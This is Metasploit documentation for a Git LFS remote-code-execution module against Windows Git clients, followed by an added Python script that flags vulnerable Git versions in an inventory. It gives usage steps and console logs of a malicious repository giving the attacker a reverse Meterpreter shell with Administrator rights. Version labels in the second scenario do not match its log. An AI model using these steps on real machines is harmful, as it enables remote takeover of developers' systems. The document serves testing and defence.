metasploit-gs/documentation/modules/exploit/windows/http/git_lfs_rce.md
2021-09-03 16:15:39 -05:00

Vulnerable Application

Git versions <= 2.29.2 include the git-lfs extension, which allows remote attackers to execute arbitrary code on the victim's Windows system upon a clone operation.

Vulnerable Installation

  1. Download a vulnerable version of Git for Windows: v2.28.0
  2. On the Select Components section of the installer, make sure Git LFS is selected (should be by default)
  3. You should now be able to run the exploit and get a session on Windows

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/windows/http/git_lfs_rce
  4. Do: run
  5. Ensure the exploit sets up a repository to be cloned, e.g.: http://192.168.123.1:8080/fixflex.git
  6. From the victim machine, clone the repository created by the exploit.
  7. You should get a shell.

Scenarios

Git v2.28.0 on Windows 10 (2004)

msf6 exploit(windows/http/git_lfs_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.123.1:4447 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
msf6 exploit(windows/http/git_lfs_rce) > [*] Using URL: http://0.0.0.0:8080/qmuVNDrve
[*] Local IP: http://192.168.2.114:8080/qmuVNDrve
[*] Server started.
[*] Git repository to clone: http://192.168.123.1:8080/flowdesk.git
[*] Sending payload data...
[*] Sending LFS object...
[*] Sending stage (200262 bytes) to 192.168.123.130
[+] Deleted .gitattributes
[*] Meterpreter session 1 opened (192.168.123.1:4447 -> 192.168.123.130:50296) at 2021-08-09 16:45:42 -0400

msf6 exploit(windows/http/git_lfs_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-13BFU78\Administrator
meterpreter > sysinfo
Computer        : DESKTOP-13BFU78
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > 

Git v2.30.0 on Windows 10 20H2

msf6 exploit(windows/http/git_lfs_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
msf6 exploit(windows/http/git_lfs_rce) > [*] Using URL: http://0.0.0.0:8080/15VCXHvHTOq5O
[*] Local IP: http://192.168.2.114:8080/15VCXHvHTOq5O
[*] Server started.
[*] Git repository to clone: http://192.168.123.1:8080/fixflex.git
[-] Exception handling request: The git client needs to be running on windows with a version less than 2.29.2. The client found was running on: Windows and was version: 2.32.0
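
The last scenario shows the module refusing a patched client; the same version boundary can be applied defensively across a fleet. The following is an added example, not part of the module or its documentation: it classifies collected Git version strings against the `<= 2.29.2` boundary stated under Vulnerable Application. The two input formats (`git --version` output and the `git/<version>` HTTP User-Agent), the host names and the sample inventory are assumptions constructed for illustration.

```python
import re

# Boundary taken from this page's "Vulnerable Application" section (<= 2.29.2).
MAX_VULNERABLE = (2, 29, 2)

# Accepts `git --version` output ("git version 2.28.0.windows.1") and the
# HTTP User-Agent form ("git/2.28.0.windows.1"). Both formats are assumptions
# about what the inventory or proxy log source records.
_VERSION_RE = re.compile(
    r"\bgit(?:\s+version\s+|/)(\d+)\.(\d+)(?:\.(\d+))?(\S*)", re.IGNORECASE
)

def parse_git_version(text):
    """Return ((major, minor, patch), is_windows_build), or None if unparseable."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    version = (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))
    # Git for Windows builds carry a ".windows.N" suffix; the build number N
    # is ignored, so the check errs on the side of flagging.
    return version, ".windows." in m.group(4).lower()

def classify(text):
    """Map one version string to vulnerable / ok / not-windows / unknown."""
    parsed = parse_git_version(text)
    if parsed is None:
        return "unknown"          # needs manual follow-up, not a pass
    version, is_windows = parsed
    if not is_windows:
        return "not-windows"      # the page describes a Windows-only issue
    return "vulnerable" if version <= MAX_VULNERABLE else "ok"

def audit(inventory):
    """inventory: iterable of (host, version_string) pairs."""
    return {host: classify(raw) for host, raw in inventory}

# Constructed sample inventory (hypothetical hosts).
SAMPLE = [
    ("WS-01", "git version 2.28.0.windows.1"),
    ("WS-02", "git version 2.32.0.windows.2"),
    ("WS-03", "git/2.29.2.windows.1"),
    ("BUILD-01", "git version 2.25.1"),
    ("WS-04", "'git' is not recognized as an internal or external command"),
]

if __name__ == "__main__":
    for host, status in audit(SAMPLE).items():
        print(f"{host:10} {status}")
```

Hosts reported as `unknown` returned no parseable version and should be checked by hand rather than treated as patched.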